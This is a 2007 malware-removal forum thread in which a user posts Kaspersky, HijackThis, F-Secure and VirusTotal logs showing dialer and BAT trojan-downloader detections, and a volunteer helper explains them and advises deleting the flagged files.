I am here again

[mightyuselessone]

Hi you are just going to love me LOL. Yes I did just do a fresh install on a brand new hd and I should not be infected but....

well look for yourself (groan) here are kap and HJT
the 3 017 entries on HJT are really troublesome to me are they really lop?

-------------------------------------------------------------------------------
KASPERSKY ONLINE SCANNER REPORT
Tuesday, August 28, 2007 11:10:04 AM
Operating System: Microsoft Windows 2000 Professional, Service Pack 4 (Build 2195)
Kaspersky Online Scanner version: 5.0.93.0
Kaspersky Anti-Virus database last update: 28/08/2007
Kaspersky Anti-Virus database records: 394397
-------------------------------------------------------------------------------

Scan Settings:
Scan using the following antivirus database: extended
Scan Archives: true
Scan Mail Bases: true

Scan Target - My Computer:
C:\
D:\

Scan Statistics:
Total number of scanned objects: 13630
Number of viruses found: 2
Number of infected objects: 4
Number of suspicious objects: 0
Duration of the scan process: 00:08:29

Infected Object Name / Virus Name / Last Action
C:\Documents and Settings\All Users\Application Data\avg7\Log\emc.log Object is locked skipped
C:\Documents and Settings\All Users\Application Data\Grisoft\Avg7Data\avg7log.log Object is locked skipped
C:\Documents and Settings\All Users\Application Data\Grisoft\Avg7Data\avg7log.log.lck Object is locked skipped
C:\Documents and Settings\Default User\Cookies\index.dat Object is locked skipped
C:\Documents and Settings\Default User\Local Settings\History\History.IE5\index.dat Object is locked skipped
C:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content.IE5\7MVQFKE7\dual[1].jpg Infected: not-a-virus:Dialer.Win32.Agent.b skipped
C:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content.IE5\index.dat Object is locked skipped
C:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content.IE5\USM7QP0Q\dual[1].jpg Infected: not-a-virus:Dialer.Win32.Agent.b skipped
C:\Documents and Settings\Ogre_Family\Cookies\index.dat Object is locked skipped
C:\Documents and Settings\Ogre_Family\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat Object is locked skipped
C:\Documents and Settings\Ogre_Family\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat.LOG Object is locked skipped
C:\Documents and Settings\Ogre_Family\Local Settings\History\History.IE5\index.dat Object is locked skipped
C:\Documents and Settings\Ogre_Family\Local Settings\History\History.IE5\MSHist012007082820070829\index.dat Object is locked skipped
C:\Documents and Settings\Ogre_Family\Local Settings\Temp\~DF720.tmp Object is locked skipped
C:\Documents and Settings\Ogre_Family\Local Settings\Temporary Internet Files\Content.IE5\index.dat Object is locked skipped
C:\Documents and Settings\Ogre_Family\NTUSER.DAT Object is locked skipped
C:\Documents and Settings\Ogre_Family\ntuser.dat.LOG Object is locked skipped
C:\Program Files\Common Files\delsim\del.exe Infected: not-a-virus:Dialer.Win32.Agent.b skipped
C:\Program Files\Zone Labs\ZoneAlarm\MailFrontier\MailBuddy.log Object is locked skipped
C:\WINNT\CSC\00000001 Object is locked skipped
C:\WINNT\Debug\ipsecpa.log Object is locked skipped
C:\WINNT\Debug\oakley.log Object is locked skipped
C:\WINNT\Debug\PASSWD.LOG Object is locked skipped
C:\WINNT\Internet Logs\fwdbglog.txt Object is locked skipped
C:\WINNT\Internet Logs\fwpktlog.txt Object is locked skipped
C:\WINNT\Internet Logs\IAMDB.RDB Object is locked skipped
C:\WINNT\Internet Logs\imsDebug.log Object is locked skipped
C:\WINNT\Internet Logs\OGRE-M4U5AONIU6.ldb Object is locked skipped
C:\WINNT\Internet Logs\tvDebug.log Object is locked skipped
C:\WINNT\SchedLgU.Txt Object is locked skipped
C:\WINNT\SoftwareDistribution\EventCache\{A9DA51B4-7EFE-4A9D-A7DA-70D7345D5E92}.bin Object is locked skipped
C:\WINNT\SoftwareDistribution\ReportingEvents.log Object is locked skipped
C:\WINNT\system32\config\AppEvent.Evt Object is locked skipped
C:\WINNT\system32\config\default Object is locked skipped
C:\WINNT\system32\config\default.LOG Object is locked skipped
C:\WINNT\system32\config\SAM Object is locked skipped
C:\WINNT\system32\config\SAM.LOG Object is locked skipped
C:\WINNT\system32\config\SecEvent.Evt Object is locked skipped
C:\WINNT\system32\config\SECURITY Object is locked skipped
C:\WINNT\system32\config\SECURITY.LOG Object is locked skipped
C:\WINNT\system32\config\software Object is locked skipped
C:\WINNT\system32\config\software.LOG Object is locked skipped
C:\WINNT\system32\config\SysEvent.Evt Object is locked skipped
C:\WINNT\system32\config\system Object is locked skipped
C:\WINNT\system32\config\SYSTEM.ALT Object is locked skipped
C:\WINNT\system32\o Infected: Trojan-Downloader.BAT.Ftp.ab skipped
C:\WINNT\Temp\ZLT06a05.TMP Object is locked skipped
C:\WINNT\WindowsUpdate.log Object is locked skipped

Scan process completed.

Logfile of HijackThis v1.99.1
Scan saved at 11:10:47 AM, on 28/08/2007
Platform: Windows 2000 SP4 (WinNT 5.00.2195)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINNT\System32\smss.exe
C:\WINNT\system32\winlogon.exe
C:\WINNT\system32\services.exe
C:\WINNT\system32\lsass.exe
C:\WINNT\system32\Ati2evxx.exe
C:\WINNT\system32\svchost.exe
C:\WINNT\system32\spoolsv.exe
C:\PROGRA~1\Grisoft\AVG7\avgamsvr.exe
C:\PROGRA~1\Grisoft\AVG7\avgupsvc.exe
C:\PROGRA~1\Grisoft\AVG7\avgemc.exe
C:\WINNT\System32\svchost.exe
C:\WINNT\system32\MSTask.exe
C:\WINNT\system32\ZoneLabs\vsmon.exe
C:\WINNT\system32\Ati2evxx.exe
C:\WINNT\System32\WBEM\WinMgmt.exe
C:\WINNT\system32\svchost.exe
C:\Program Files\Zone Labs\ZoneAlarm\zlclient.exe
C:\PROGRA~1\Grisoft\AVG7\avgcc.exe
C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
C:\PROGRA~1\ZONELA~1\ZONEAL~1\MAILFR~1\mantispm.exe
C:\WINNT\explorer.exe
C:\Documents and Settings\Ogre_Family\Desktop\TeaTimer.exe
C:\Documents and Settings\Ogre_Family\Desktop\HijackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.ca/
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Window Title = Microsoft Internet Explorer provided by Shaw Internet
O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINNT\System32\msdxm.ocx
O4 - HKLM\..\Run: [Synchronization Manager] mobsync.exe /logon
O4 - HKLM\..\Run: [Zone Labs Client] C:\Program Files\Zone Labs\ZoneAlarm\zlclient.exe
O4 - HKLM\..\Run: [AVG7_CC] C:\PROGRA~1\Grisoft\AVG7\avgcc.exe /STARTUP
O4 - HKCU\..\Run: [SpybotSD TeaTimer] C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
O16 - DPF: {0E5F0222-96B9-11D3-8997-00104BD12D94} (PCPitstop Utility) - http://pcpitstop.com/pcpitstop/PCPitStop.CAB
O16 - DPF: {0EB0E74A-2A76-4AB3-A7FB-9BD8C29F7F75} (CKAVWebScan Object) - http://www.kaspersky.com/kos/english...an_unicode.cab
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://www.update.microsoft.com/wind...?1188275347500
O16 - DPF: {6E32070A-766D-4EE6-879C-DC1FA91D2FC3} (MUWebControl Class) - http://www.update.microsoft.com/micr...?1188282330906
O16 - DPF: {7B297BFD-85E4-4092-B2AF-16A91B2EA103} (WScanCtl Class) - http://www.ca.com/us/securityadvisor...fo/webscan.cab
O17 - HKLM\System\CS1\Services\Tcpip\Parameters: SearchList = ,wp.shawcable.net,nr.wp.shawcable.net
O17 - HKLM\System\CS2\Services\Tcpip\Parameters: SearchList = ,wp.shawcable.net,nr.wp.shawcable.net
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: SearchList = ,wp.shawcable.net,nr.wp.shawcable.net
O23 - Service: Ati HotKey Poller - ATI Technologies Inc. - C:\WINNT\system32\Ati2evxx.exe
O23 - Service: AVG7 Alert Manager Server (Avg7Alrt) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVG7\avgamsvr.exe
O23 - Service: AVG7 Update Service (Avg7UpdSvc) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVG7\avgupsvc.exe
O23 - Service: AVG E-mail Scanner (AVGEMS) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVG7\avgemc.exe
O23 - Service: CA ISafe (CAISafe) - Computer Associates International, Inc. - C:\WINNT\System32\ZoneLabs\isafe.exe
O23 - Service: Logical Disk Manager Administrative Service (dmadmin) - VERITAS Software Corp. - C:\WINNT\System32\dmadmin.exe
O23 - Service: TrueVector Internet Monitor (vsmon) - Zone Labs, LLC - C:\WINNT\system32\ZoneLabs\vsmon.exe

[pskelley]

the 3 017 entries on HJT are really troublesome to me are they really lop?

O17 - HKLM\System\CS1\Services\Tcpip\Parameters: SearchList = ,wp.shawcable.net,nr.wp.shawcable.net
All three are for http://www.robtex.com/dns/wp.shawcable.net.html

I have no idea how you could get infected this fast? Maybe you should not go online?

KASPERSKY ONLINE SCANNER REPORT
Tuesday, August 28, 2007 11:10:04 AM
Number of infected objects: 4

Delete the complete contents of the folder in RED
C:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content.IE5\7MVQFKE7\dual[1].jpg Infected: not-a-virus:Dialer.Win32.Agent.b skipped
C:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content.IE5\USM7QP0Q\dual[1].jpg Infected: not-a-virus:Dialer.Win32.Agent.b skipped

This is a dialer, delete the folder in REDC:\Program Files\Common Files\delsim\del.exe Infected: not-a-virus:Dialer.Win32.Agent.b skipped

This is a trojan downloader, delete the folder in RED
C:\WINNT\system32\o Infected: Trojan-Downloader.BAT.Ftp.ab skipped

If any of those give you problems, boot into Safe Mode and delete then there:
http://spyware-free.us/tutorials/safemode/

You may need to enabled hidden files and folders to see them:
http://www.xtra.co.nz/help/0,,4155-1916458,00.html

This is how easy it is to get infected:
http://www.theregister.com/2007/05/1...e_malware_map/
http://redtape.msnbc.com/2007/05/the_next_net_th.html

You need to read this information about how to stay safe online:
Here is some great information from experts in this field that will help you stay clean and safe online.
http://users.telenet.be/bluepatchy/m...revention.html
http://forums.spybot.info/showthread.php?t=279
http://russelltexas.com/malware/allclear.htm
http://forum.malwareremoval.com/viewtopic.php?t=14
http://www.bleepingcomputer.com/forums/topict2520.html
http://cybercoyote.org/security/not-admin.shtml

Thanks...pskelley
Safer Networking Forums
http://www.spybot.info/en/donate/index.html
If you are reading this information...thank a teacher,
If you are reading it in English...thank a soldier.

[mightyuselessone]

I have no idea how you could get infected this fast? Maybe you should not go online?

What is this supposed to mean it sounds to me as if you are being rude about this! I don't understand how that this is any of my fault I had a copy of spybotsd14 on disk and zonealarm that was installed before even installing the internet providers software. We(my wife and I) also first updated spybot and zone alarm using thier updaters before accessing the internet and then we updated windows as fast as possible. We were infected from via Shaw from what i can tell and they are the Internet, Cable and Telephone provider that we use here. First of all I don't understand if this is a real lop infection, and I wish to know how to fix it. What more can i possibly use to keep from getting infected. We have always used and continue to use all recomended tools to us from the forums. Also i have not visited any sites except Microsoft, safer-networking, Javacool, Zonealarm, Griftsoft and our ISP startpage Directly(we manually typed in the addresses then pluged in the ethernet cable unpluging between downloads) We did not at any time use a search engine before all the above were updated and installed. nor did we "surf the web"

Please Advise and help with this problem
mightyuselessone

-------------------------------------------------------------------------------
KASPERSKY ONLINE SCANNER REPORT
Tuesday, August 28, 2007 2:05:21 PM
Operating System: Microsoft Windows 2000 Professional, Service Pack 4 (Build 2195)
Kaspersky Online Scanner version: 5.0.93.0
Kaspersky Anti-Virus database last update: 28/08/2007
Kaspersky Anti-Virus database records: 395278
-------------------------------------------------------------------------------

Scan Settings:
Scan using the following antivirus database: extended
Scan Archives: true
Scan Mail Bases: true

Scan Target - My Computer:
C:\
D:\

Scan Statistics:
Total number of scanned objects: 12892
Number of viruses found: 0
Number of infected objects: 0
Number of suspicious objects: 0
Duration of the scan process: 00:08:25

Infected Object Name / Virus Name / Last Action
C:\Documents and Settings\All Users\Application Data\avg7\Log\emc.log Object is locked skipped
C:\Documents and Settings\All Users\Application Data\Grisoft\Avg7Data\avg7log.log Object is locked skipped
C:\Documents and Settings\All Users\Application Data\Grisoft\Avg7Data\avg7log.log.lck Object is locked skipped
C:\Documents and Settings\Default User\Cookies\index.dat Object is locked skipped
C:\Documents and Settings\Default User\Local Settings\History\History.IE5\index.dat Object is locked skipped
C:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content.IE5\index.dat Object is locked skipped
C:\Documents and Settings\Ogre_Family\Cookies\index.dat Object is locked skipped
C:\Documents and Settings\Ogre_Family\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat Object is locked skipped
C:\Documents and Settings\Ogre_Family\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat.LOG Object is locked skipped
C:\Documents and Settings\Ogre_Family\Local Settings\History\History.IE5\index.dat Object is locked skipped
C:\Documents and Settings\Ogre_Family\Local Settings\Temp\~DF720.tmp Object is locked skipped
C:\Documents and Settings\Ogre_Family\Local Settings\Temporary Internet Files\Content.IE5\index.dat Object is locked skipped
C:\Documents and Settings\Ogre_Family\NTUSER.DAT Object is locked skipped
C:\Documents and Settings\Ogre_Family\ntuser.dat.LOG Object is locked skipped
C:\Program Files\Zone Labs\ZoneAlarm\MailFrontier\MailBuddy.log Object is locked skipped
C:\WINNT\CSC\00000001 Object is locked skipped
C:\WINNT\Debug\ipsecpa.log Object is locked skipped
C:\WINNT\Debug\oakley.log Object is locked skipped
C:\WINNT\Debug\PASSWD.LOG Object is locked skipped
C:\WINNT\Internet Logs\fwdbglog.txt Object is locked skipped
C:\WINNT\Internet Logs\fwpktlog.txt Object is locked skipped
C:\WINNT\Internet Logs\IAMDB.RDB Object is locked skipped
C:\WINNT\Internet Logs\imsDebug.log Object is locked skipped
C:\WINNT\Internet Logs\OGRE-M4U5AONIU6.ldb Object is locked skipped
C:\WINNT\Internet Logs\tvDebug.log Object is locked skipped
C:\WINNT\SchedLgU.Txt Object is locked skipped
C:\WINNT\SoftwareDistribution\EventCache\{A9DA51B4-7EFE-4A9D-A7DA-70D7345D5E92}.bin Object is locked skipped
C:\WINNT\SoftwareDistribution\ReportingEvents.log Object is locked skipped
C:\WINNT\system32\config\AppEvent.Evt Object is locked skipped
C:\WINNT\system32\config\default Object is locked skipped
C:\WINNT\system32\config\default.LOG Object is locked skipped
C:\WINNT\system32\config\SAM Object is locked skipped
C:\WINNT\system32\config\SAM.LOG Object is locked skipped
C:\WINNT\system32\config\SecEvent.Evt Object is locked skipped
C:\WINNT\system32\config\SECURITY Object is locked skipped
C:\WINNT\system32\config\SECURITY.LOG Object is locked skipped
C:\WINNT\system32\config\software Object is locked skipped
C:\WINNT\system32\config\software.LOG Object is locked skipped
C:\WINNT\system32\config\SysEvent.Evt Object is locked skipped
C:\WINNT\system32\config\system Object is locked skipped
C:\WINNT\system32\config\SYSTEM.ALT Object is locked skipped
C:\WINNT\Temp\ZLT06a05.TMP Object is locked skipped
C:\WINNT\WindowsUpdate.log Object is locked skipped

Scan process completed.

Logfile of HijackThis v1.99.1
Scan saved at 2:07:01 PM, on 28/08/2007
Platform: Windows 2000 SP4 (WinNT 5.00.2195)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINNT\System32\smss.exe
C:\WINNT\system32\winlogon.exe
C:\WINNT\system32\services.exe
C:\WINNT\system32\lsass.exe
C:\WINNT\system32\Ati2evxx.exe
C:\WINNT\system32\svchost.exe
C:\WINNT\system32\spoolsv.exe
C:\PROGRA~1\Grisoft\AVG7\avgamsvr.exe
C:\PROGRA~1\Grisoft\AVG7\avgupsvc.exe
C:\PROGRA~1\Grisoft\AVG7\avgemc.exe
C:\WINNT\System32\svchost.exe
C:\WINNT\system32\MSTask.exe
C:\WINNT\system32\ZoneLabs\vsmon.exe
C:\WINNT\system32\Ati2evxx.exe
C:\WINNT\System32\WBEM\WinMgmt.exe
C:\WINNT\system32\svchost.exe
C:\Program Files\Zone Labs\ZoneAlarm\zlclient.exe
C:\PROGRA~1\Grisoft\AVG7\avgcc.exe
C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
C:\PROGRA~1\ZONELA~1\ZONEAL~1\MAILFR~1\mantispm.exe
C:\WINNT\explorer.exe
C:\Documents and Settings\Ogre_Family\Desktop\TeaTimer.exe
C:\Documents and Settings\Ogre_Family\Desktop\HijackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.ca/
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Window Title = Microsoft Internet Explorer provided by Shaw Internet
O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINNT\System32\msdxm.ocx
O4 - HKLM\..\Run: [Synchronization Manager] mobsync.exe /logon
O4 - HKLM\..\Run: [Zone Labs Client] C:\Program Files\Zone Labs\ZoneAlarm\zlclient.exe
O4 - HKLM\..\Run: [AVG7_CC] C:\PROGRA~1\Grisoft\AVG7\avgcc.exe /STARTUP
O4 - HKCU\..\Run: [SpybotSD TeaTimer] C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
O16 - DPF: {0E5F0222-96B9-11D3-8997-00104BD12D94} (PCPitstop Utility) - http://pcpitstop.com/pcpitstop/PCPitStop.CAB
O16 - DPF: {0EB0E74A-2A76-4AB3-A7FB-9BD8C29F7F75} (CKAVWebScan Object) - http://www.kaspersky.com/kos/english...an_unicode.cab
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://www.update.microsoft.com/wind...?1188275347500
O16 - DPF: {6E32070A-766D-4EE6-879C-DC1FA91D2FC3} (MUWebControl Class) - http://www.update.microsoft.com/micr...?1188282330906
O16 - DPF: {7B297BFD-85E4-4092-B2AF-16A91B2EA103} (WScanCtl Class) - http://www.ca.com/us/securityadvisor...fo/webscan.cab
O17 - HKLM\System\CS1\Services\Tcpip\Parameters: SearchList = ,wp.shawcable.net,nr.wp.shawcable.net
O17 - HKLM\System\CS2\Services\Tcpip\Parameters: SearchList = ,wp.shawcable.net,nr.wp.shawcable.net
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: SearchList = ,wp.shawcable.net,nr.wp.shawcable.net
O23 - Service: Ati HotKey Poller - ATI Technologies Inc. - C:\WINNT\system32\Ati2evxx.exe
O23 - Service: AVG7 Alert Manager Server (Avg7Alrt) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVG7\avgamsvr.exe
O23 - Service: AVG7 Update Service (Avg7UpdSvc) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVG7\avgupsvc.exe
O23 - Service: AVG E-mail Scanner (AVGEMS) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVG7\avgemc.exe
O23 - Service: CA ISafe (CAISafe) - Computer Associates International, Inc. - C:\WINNT\System32\ZoneLabs\isafe.exe
O23 - Service: Logical Disk Manager Administrative Service (dmadmin) - VERITAS Software Corp. - C:\WINNT\System32\dmadmin.exe
O23 - Service: TrueVector Internet Monitor (vsmon) - Zone Labs, LLC - C:\WINNT\system32\ZoneLabs\vsmon.exe

[pskelley]

Those 017 items are valid, if you have additional questions about those, I suggest you contact your Internet Service Provider.
Your HJT log is clean as is your Kaspersky. This is about all I can do for you except to wish you safe surfing.

Thanks

[mightyuselessone]

sorry if i seem a little annoying to deal with i am not going out trying to get infected purposely, and i really do appreciate the help that i receive. i have managed to get my system somewhat secured now my wife doing most of it. i need help getting rid of 2 things in spybot i keep coming up with 9 redirects (windows sec etc) and a virus by f-secure's definition please help i am trying to get this system to a point where i can use it and not be infected as you will see the 017's that were on the HJT log are no longer there and Shaw has all but admitted that it was someone on the local internet that was the root of it when i gave them the ISP addresses that Zone Alarm was showing. Here is f-secure, HJT and virus total logs i hope that this is not that serious and you are willing to help.
ty
mightyuselessone

Logfile of Trend Micro HijackThis v2.0.0 (BETA)
Scan saved at 11:57:15 AM, on 30/08/2007
Platform: Windows 2000 SP4 (WinNT 5.00.2195)
Boot mode: Normal

Running processes:
C:\WINNT\System32\smss.exe
C:\WINNT\system32\winlogon.exe
C:\WINNT\system32\services.exe
C:\WINNT\system32\lsass.exe
C:\WINNT\system32\Ati2evxx.exe
C:\WINNT\system32\svchost.exe
C:\WINNT\system32\ZoneLabs\vsmon.exe
C:\WINNT\system32\spoolsv.exe
C:\PROGRA~1\Grisoft\AVG7\avgamsvr.exe
C:\PROGRA~1\Grisoft\AVG7\avgupsvc.exe
C:\PROGRA~1\Grisoft\AVG7\avgemc.exe
C:\Program Files\Executive Software\DiskeeperLite\DKService.exe
C:\WINNT\System32\svchost.exe
C:\WINNT\cnmtmgr.exe
C:\WINNT\system32\MSTask.exe
C:\WINNT\System32\WBEM\WinMgmt.exe
C:\WINNT\system32\svchost.exe
C:\WINNT\system32\Ati2evxx.exe
C:\PROGRA~1\Grisoft\AVG7\avgcc.exe
C:\Program Files\Zone Labs\ZoneAlarm\zlclient.exe
C:\Program Files\Java\jre1.6.0_02\bin\jusched.exe
C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
C:\WINNT\System32\svchost.exe
C:\WINNT\explorer.exe
C:\Documents and Settings\Administrator\Desktop\HiJackThis_v2.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Window Title = Internet Explorer Provided by SHAW Internet
O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINNT\System32\msdxm.ocx
O4 - HKLM\..\Run: [Synchronization Manager] mobsync.exe /logon
O4 - HKLM\..\Run: [shawnotify] c:\progra~1\shaw\update\updateloader.exe /notify
O4 - HKLM\..\Run: [AVG7_CC] C:\PROGRA~1\Grisoft\AVG7\avgcc.exe /STARTUP
O4 - HKLM\..\Run: [ZoneAlarm Client] "C:\Program Files\Zone Labs\ZoneAlarm\zlclient.exe"
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre1.6.0_02\bin\jusched.exe"
O4 - HKCU\..\Run: [SpybotSD TeaTimer] C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
O4 - HKCU\..\Run: [MsnMsgr] "C:\Program Files\MSN Messenger\MsnMsgr.Exe" /background
O4 - HKUS\.DEFAULT\..\Run: [AVG7_Run] C:\PROGRA~1\Grisoft\AVG7\avgw.exe /RUNONCE (User 'Default user')
O16 - DPF: {0B79F48A-E8D6-11DB-9283-E25056D89593} (F-Secure Online Scanner 3.1) - http://support.f-secure.com/ols/fscax.cab
O16 - DPF: {0EB0E74A-2A76-4AB3-A7FB-9BD8C29F7F75} (CKAVWebScan Object) - http://www.kaspersky.com/kos/english...an_unicode.cab
O16 - DPF: {17492023-C23A-453E-A040-C7C580BBF700} (Windows Genuine Advantage Validation Tool) - http://go.microsoft.com/fwlink/?linkid=39204
O16 - DPF: {49E71DB9-E803-43BA-AF81-1CAF61A6C4CB} (F-Secure Online Scanner 3.2) - http://support.f-secure.com/ols/beta/fscax.cab
O16 - DPF: {6E32070A-766D-4EE6-879C-DC1FA91D2FC3} (MUWebControl Class) - http://www.update.microsoft.com/micr...?1188412521140
O23 - Service: Ati HotKey Poller - ATI Technologies Inc. - C:\WINNT\system32\Ati2evxx.exe
O23 - Service: AVG7 Alert Manager Server (Avg7Alrt) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVG7\avgamsvr.exe
O23 - Service: AVG7 Update Service (Avg7UpdSvc) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVG7\avgupsvc.exe
O23 - Service: AVG E-mail Scanner (AVGEMS) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVG7\avgemc.exe
O23 - Service: Diskeeper - Executive Software International, Inc. - C:\Program Files\Executive Software\DiskeeperLite\DKService.exe
O23 - Service: Logical Disk Manager Administrative Service (dmadmin) - VERITAS Software Corp. - C:\WINNT\System32\dmadmin.exe
O23 - Service: TrueVector Internet Monitor (vsmon) - Zone Labs, LLC - C:\WINNT\system32\ZoneLabs\vsmon.exe

--
End of file - 3617 bytes

Scanning Report
Thursday, August 30, 2007 10:37:47 - 10:56:04

Computer name: PARKS-Z240HYQ5A
Scanning type: Scan system for viruses, rootkits, spyware
Target: C:\
Result: 4 malware found
Alexa (spyware)

* System (Disinfected)

Text/BotFTP.gen (virus)

* C:\WINNT\SYSTEM32\I (Submitted)

Tracking Cookie (spyware)

* System (Disinfected)
* System

Statistics
Scanned:

* Files: 15099
* System: 2788
* Not scanned: 2

Actions:

* Disinfected: 2
* Renamed: 0
* Deleted: 0
* None: 2
* Submitted: 1

Files not scanned:

* C:\PAGEFILE.SYS
* C:\WINNT\SYSTEM32\CONFIG\DEFAULT

Options
Scanning engines:

* F-Secure AVP: 7.0.171, 2007-08-30
* F-Secure Blacklight: 1.0.64
* F-Secure Draco: 1.0.35, 0593-150-72
* F-Secure Libra: 2.4.2, 2007-08-28
* F-Secure Orion: 1.2.37, 2007-08-30
* F-Secure Pegasus: 1.19.0, 2007-07-19

Scanning options:

* Scan defined files: COM EXE SYS OV? BIN SCR DLL SHS HTM HTML HTT VBS JS INF VXD DO? XL? RTF CPL WIZ HTA PP? PWZ P?T MSO PIF . ACM ASP AX CNV CSC DRV INI MDB MPD MPP MPT OBD OBT OCX PCI TLB TSP WBK WBT WPC WSH VWP WML BOO HLP TD0 TT6 MSG ASD JSE VBE WSC CHM EML PRC SHB LNK WSF {* PDF ZL? XML ZIP XXXANI AVB BAT CMD LSP MAP MHT MIF PHP POT WMF NWS TAR
* Use Advanced heuristics

File i received on 08.30.2007 18:51:27 (CET)
Current status: Loading ... queued waiting scanning finished NOT FOUND STOPPED
Result: 8/32 (25%)
Loading server information...
Your file is queued in position: 2.
Estimated start time is between 43 and 62 seconds.
Do not close the window until scan is complete.
The scanner that was processing your file is stopped at this moment, we are going to wait a few seconds to try to recover your result.
If you are waiting for more than five minutes you have to resend your file.
Your file is being scanned by VirusTotal in this moment,
results will be shown as they're generated.
Compact Compact
Print results Print results
Your file has expired or does not exists.
Service is stopped in this moments, your file is waiting to be scanned (position: ) for an undefined time.

You can wait for web response (automatic reload) or type your email in the form below and click "request" so the system sends you a notification when the scan is finished.
Email:

Antivirus Version Last Update Result
AhnLab-V3 2007.8.31.0 2007.08.30 -
AntiVir 7.4.1.66 2007.08.30 -
Authentium 4.93.8 2007.08.29 -
Avast 4.7.1029.0 2007.08.29 -
AVG 7.5.0.484 2007.08.29 -
BitDefender 7.2 2007.08.30 -
CAT-QuickHeal 9.00 2007.08.30 -
ClamAV 0.91.2 2007.08.30 Trojan.Downloader.Bat.Ftp.gen-1
DrWeb 4.33 2007.08.30 -
eSafe 7.0.15.0 2007.08.29 -
eTrust-Vet 31.1.5095 2007.08.30 -
Ewido 4.0 2007.08.30 -
FileAdvisor 1 2007.08.30 -
Fortinet 3.11.0.0 2007.08.30 BAT/Dloader.AB!worm
F-Prot 4.3.2.48 2007.08.29 -
F-Secure 6.70.13030.0 2007.08.30 Text/BotFTP.gen
Ikarus T3.1.1.12 2007.08.30 -
Kaspersky 4.0.2.24 2007.08.30 -
McAfee 5109 2007.08.30 W32/Sdbot.worm!ftp
Microsoft 1.2803 2007.08.30 TrojanDownloader:BAT/Ftper.gen
NOD32v2 2492 2007.08.30 -
Norman 5.80.02 2007.08.30 Text/BotFTP.gen
Panda 9.0.0.4 2007.08.29 -
Prevx1 V2 2007.08.30 -
Rising 19.38.32.00 2007.08.30 -
Sophos 4.21.0 2007.08.30 Mal/BotFTP-A
Sunbelt 2.2.907.0 2007.08.25 -
Symantec 10 2007.08.30 -
TheHacker 6.1.9.175 2007.08.30 W32/SdBot.worm
VBA32 3.12.2.3 2007.08.30 -
VirusBuster 4.3.26:9 2007.08.30 -
Webwasher-Gateway 6.0.1 2007.08.30 -
Additional information
File size: 77 bytes
MD5: 4b169ca597ed0c1cf2ecf51e651273f7
SHA1: cfe0917ffb45c0077993143e9c13eb8b8f42841d

ATENTION ATTENTION: VirusTotal is a free service offered by Hispasec Sistemas. There are no guarantees about the availability and continuity of this service. Although the detection rate afforded by the use of multiple antivirus engines is far superior to that offered by just one product, these results DO NOT guarantee the harmlessness of a file. Currently, there is not any solution that offers a 100% effectiveness rate for detecting viruses and malware

[pskelley]

Let's try to clean the air a little:

1) I have no desire to see tracking cookies that are a part of surfing, you are going to get them if you go on the internet. Here is what they are:
http://en.wikipedia.org/wiki/HTTP_cookie if you wish to control them, here is how:
http://www.mvps.org/winhelp2002/cookies.htm
http://www.microsoft.com/windows/ie/...cy/config.mspx

2) You are using a beta version of HJT, please delete it from your computer and download a self-installing version which will install itself in the proper location if you will follow the prompts:
http://www.trendsecure.com/portal/en...HJTInstall.exe

Post a new HJT log and describe any malware symptoms. Please do not tell me about any tracking cookies.

Thank you

Thanks

[mightyuselessone]

Text/BotFTP.gen (virus)

* C:\WINNT\SYSTEM32\I (Submitted)
this is what i was thinking about not the tracking cookies those i don't worry about that badly. i uploaded that file to virus total and it came back 25% as a BOT or SDWorm. or other sujuest trojan as well.

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 1:23:58 PM, on 30/08/2007
Platform: Windows 2000 SP4 (WinNT 5.00.2195)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)
Boot mode: Normal

Running processes:
C:\WINNT\System32\smss.exe
